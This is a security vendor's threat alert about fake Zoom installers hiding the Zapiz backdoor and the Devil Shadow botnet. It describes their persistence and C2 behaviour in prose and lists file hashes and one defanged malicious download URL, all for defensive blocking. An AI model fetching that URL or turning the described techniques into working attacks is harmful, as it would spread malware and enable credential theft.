• Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Transform
      • SOC Consultancy
      •     SOC Maturity Assessment
      •     SOC Model Evaluation
      •     SOC Gap Analysis
      •     SIEM Gap Analysis
      •     SIEM Optimization
      •     SOC Content Pack
    • Train
      • Security Awareness and Training
      • Tabletop Exercise
      • Simulated Cyber Attack Exercises
    • Respond
      • Incident Response
      • Incident Analysis
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Press Release
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
Rewterz Threat Advisory – CVE-2020-8482 – ICS: ABB Device Library Wizard Information Disclosure Vulnerability
May 26, 2020
Rewterz Threat Advisory – ICS: Inductive Automation Ignition Multiple Vulnerabilities
May 28, 2020

Rewterz Threat Alert – Fake Zoom Installers Hiding Zapiz Backdoor and Devil Shadow

May 28, 2020

Severity

Medium

Analysis Summary

Samples of malware infected Zoom installers have been found and analyzed by researchers. The first sample was a sample of the Zapiz malware, which provides backdoor capabilities. The installer contains a number of encrypted files that decrypt into a separate installer file. The malware kills all remote utilities and opens port 5650 to gain remote access. Four registry entries containing configuration settings are also added. The settings notify the C2 that an email has been set up, credentials have been stolen, and the infected machine has been flagged as ready for access. The second sample was the Devil Shadow botnet. The installer contained pyclient.cmd which contains the malicious commands. A self-extracting archive contains a text file that consists of the C2 server address, a URL, a batch file used to gain persistence, and a copy of the Zoom installer. A Visual Basic script file executes the cmd files and another Visual Basic script file runs to gain persistence. All malicious files are dropped with the Zoom installer. The cmd file connects to the host URL and downloads binaries for use in malicious actions. The legitimate Zoom installer is run to prevent suspicion of malicious activity.

fake-zoom-installers-bundled-backdoor-devil-shadow-botnet_Fig1.png

Impact

  • Credential theft
  • Exposure of sensitive data 

Indicators of Compromise

SHA-256

  • 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
  • 57bf83837c18a75d2e7327cdf5bfdcc906ccf78d82237ec961a4f1bee85473cf
  • 9b6b1807f886bb9eccdc170988d6e419e4301c96817f362aca3d01df17c352fd
  • 90728a5b2f22460e1b28e3dc350a95b993a185a6170b4aa5e45b57834b90bcee
  • a26f3981ed3784bb86f5223bf14fb0047ff3fd86b8fc94753ce5a3f1702ebb56
  • 93bf084daddb10b3760f4e4424b1bc4d5d5590c30064045d01c8658a6fe50d3a
  • f01da52509792a52c6def452b3ee9b0b78acaca399341926fbe4f3212c42a55e
  • 5b7804919d437688c8811e85c54cb36efba72652bac8093833ca04b811ea87b7
  • 628928fe61e86d3b246a7822b1d1505d3694becc4a73e373f73653851d22f1a5
  • 65f725f380c9b90d409539b74bfbd8a57f0fa48843ee79838fa57ad28240feb5

URL

  • http[:]//hosting303[.]000webhostapp[.]com/devil_shadow

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.
  • Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Respond
      • Incident Response
      • Incident Analysis
  • Transform
    • SOC Consultancy
    •     SOC Maturity Assessment
    •     SOC Model Evaluation
    •     SOC Gap Analysis
    •     SIEM Gap Analysis
    •     SIEM Optimization
    •     SOC Content Pack
  • Train
    • Security Awareness and Training
    • Tabletop Exercise
    • Simulated Cyber Attack Exercises
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.